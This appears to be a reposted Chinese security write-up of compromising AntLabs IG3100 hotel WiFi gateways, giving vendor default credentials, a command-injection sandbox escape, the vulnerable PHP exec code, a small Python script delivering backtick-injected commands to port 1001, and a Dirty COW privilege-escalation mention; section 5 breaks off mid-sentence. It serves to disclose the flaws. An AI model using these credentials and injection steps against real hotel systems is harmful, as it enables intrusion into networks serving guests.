|
這幾天在新加坡參加 HITB,比起各類料理,更讓我感興趣的是它的酒店 WiFi。去了三家酒店,WiFi 用的都是統一套認證系統,是 AntLabs 的 IG3100 的設備。連接到 WiFi 後會彈出一個地址為 ezxcess.antlabs.com 的認證頁面: 
1. Backdoor Accounts通過 Google,我找到了這個系統測兩個默認口令。一個是 telnet 的帳號,帳號密碼為 console / admin,另外一個是 ftp 的帳號,帳號密碼為 ftponly / antlabs。很幸運,遇到的大部分酒店這兩個帳號都沒有禁用。 登錄進去後,發現帳號在一個受限的 shell 下,看了看 shell 自帶的命令,和 Linux 自帶的一些命令差不多,甚至可以用一些命令查看到沙盒之外的信息,比如 ps -ef: 利用 netstat -l 發現這個系統存在一個 MySQL,但是僅監聽在 127.0.0.1。同時還發現了 6000 端口是一個 SSH 服務端口。  利用 SSH,我可以創建一個端口轉發,將僅監聽在 127.0.0.1 的 3306 端口轉發到我的 MacBook 上,然後進行連接操作。  看了看,爆了個 2. Sandbox Escape剛才説到,telnet / ssh 連接進去後是在一個受限的 shell 裏,那麼作為黑客的一個特點就是看到沙盒就手癢。怎麼逃逸沙盒,這個需要看 shell 提供了什麼功能了。運行 help 看看:  經過一番思考,我發現,這個 shell 除了一些 Linux 的系統命令外,還有一些看起來不是 Linux 自帶的命令,比如 sshtun、usage_log、vlandump 等等。這些命令我猜測是一些腳本或者二進制文檔寫的,來方便管理員進行一些操作。那麼既然是開發人員編寫的,那麼就有可能有漏洞,特別是命令注入漏洞。嘗試了幾次之後,我成功利用了 vlandump 逃逸了沙盒:  沙盒是逃逸了,但是我還是絕望的發現,我被 chroot 了。chroot 我是繞不過去了,只能翻翻配置文檔來尋找樂子。然後我驚喜地在 /etc 目錄發現了 MySQL 的密碼:  那麼有了密碼,又能訪問端口,我們就可以連接 MySQL 登錄數據庫了。 3. File Read在數據庫找到了管理員的帳號密碼,成功登錄。接下來就是拿 shell 的時候了,那麼需要對這個系統做個代碼審計。  MySQL root 用户的好處就是可以讀文檔,但是我發現我讀 /etc/httpd/conf.d/httpd.conf 居然顯示沒有權限,又猜不到 Web 的目錄,場面一度十分尷尬。 峯迴路轉,我在 shell 內 ps -ef 的時候發現了一個奇怪的東西:  tcpserver 命令在 1001 啟動了個端口,轉交給 PHP 來處理。這個東西看起來好搞,利用 load_file 讀取後,發現是用 IonCube 加密過的,網上隨便找了個平台解了個密,得到代碼:  4. Limited RCE讀了讀代碼,發現進程存在一個 RCE。 function logSyslog($msg){ global $ip; global $buffer; $msg = trim($msg); if ($msg != '') { exec('/usr/bin/logger -p lpr.info -t Acc_Printer -- 'Printer ' . $ip . ' ' . $buffer . ' ' . $msg . ''', $out, $ret); if ($ret == 0) { return TRUE; } } return FALSE;} 這裏的 msg 帶入到 exec 中,並且直接雙引號包裹。那麼可以直接用反引號來執行命令。通讀了一遍代碼後,我發現除了 MySQL 查詢語句居然沒有其他可控的點。代碼如下: function generateAccount($buffer){ global $ip; global $print_previous; global $timeformat; global $dateformat; global $transactionNumberDigit; global $printer_path; global $db; $copy_label = ''; if ($buffer != $print_previous) { $query = 'SELECT * FROM ant_services.Acc_Printer_Button JOIN ant_services.Acc_Printer ON Acc_Printer_Button.printer_id=Acc_Printer.printer_id WHERE button_code=\'' . mysql_real_escape_string($buffer) . '\' AND printer_ip=\'' . mysql_real_escape_string($ip) . '\''; $rsbutton = $db->query($query); if (!($button = $rsbutton->fetch())) { logSyslog('failed to read button configuration from database. QUERY = ' . $query); return FALSE; } 往上追溯一下調用這個函數的地方,我發現了更絕望的事情: if (trim($buffer) == '(') { $buffer .= fread(STDIN, 14); if (!strstr($print_previous, $buffer)) { generateAccount($buffer); } 我們只有 14 個字節的可控點,去掉首尾的反引號後還有 12 位。這太他媽 CTF 了吧。 另外還有一個限制: while (true) { unset($printer_details); clearstatcache(); if (!($res = $db->query('SELECT * FROM ant_services.Acc_Printer WHERE printer_ip=\'' . mysql_real_escape_string($ip) . '\' AND status=\'enable\''))) { logSyslog('failed to query database to get printer details'); exit(1); } if ($res->rowCount() == '0') { logSyslog('is not found in registered printer list database '); exit(1); } 我想執行命令的話,需要是在 寫了個腳本方便執行: import zio, sysio = zio.zio(('192.168.10.2', 1001))io.write('(`%s`)' % sys.argv[1]) 不知道大家還記得之前提過有一個 FTP 的事情嗎?我發現執行命令的結果會寫在 FTP 下面的 log/acc/acc.log,這也算是意外之喜了。  5. Unlimited RCE 12 個字節怎麼想怎麼難受,但是想了想,我們有 MySQL,能寫文檔。如果把要執行的命令寫到 /tmp 目錄下,接着利用 6. DirtyCows沒啥好説的了,這個 CentOS 4 的版本,隨便提權啦。 |
|
|
来自: 昵称27086148 > 《IT》
